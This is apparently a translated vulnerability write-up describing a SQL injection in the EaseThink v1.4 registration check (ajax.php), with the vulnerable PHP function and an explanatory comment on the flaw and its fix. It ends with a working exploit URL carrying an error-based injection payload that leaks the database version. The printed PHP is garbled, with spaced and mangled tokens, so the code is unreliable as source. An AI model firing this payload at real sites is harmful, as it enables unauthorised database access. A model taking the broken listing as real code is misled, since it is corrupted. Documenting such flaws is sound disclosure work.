During registration, the user name is submitted to the backend to check whether it already exists; naturally this is done through AJAX validation, in ajax.php. Many programs overlook this check, and a SQL injection vulnerability exists there as a result.
/**
* Verify Member Data
*/
function check_user($field_name,$field_data)
{
// Start data verification
$user_data[$field_name] = $field_data;
$ Res = array ('status' => 1, 'info' => '', 'data' =>''); // used to return data
if(trim($user_data['user_name'])==''&&$field_name=='user_name')
{
$field_item['field_name'] = 'user_name';
$field_item['error'] = EMPTY_ERROR;
$res['status'] = 0;
$res['data'] = $field_item;
return $res;
}
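If ($ field_name = 'user _ name' & $ GLOBALS ['db']-> getOne ("select count (*) from ". DB_PREFIX. "user where user_name = '". trim ($ user_data ['user _ name']). "'and id <> ". intval ($ user_data ['id'])> 0) // $user_data['user_name'] holds the user name exactly as the user submitted it; it is only passed through trim() before being concatenated into the query, so a SQL injection vulnerability exists here. Note that the id value is forced to an integer with intval(), while the user name gets no escaping at all; it should be escaped or bound as a query parameter rather than concatenated.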
{
$field_item['field_name'] = 'user_name';
$field_item['error'] = EXIST_ERROR;
$res['status'] = 0;
$res['data'] = $field_item;
return $res;
}
Exp:
http:// www.2cto.com /easethink_free_v1.4/ajax.php?act=check_field&field_name=user_name&field_data='and/**/(select/**/1/**/from/**/(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23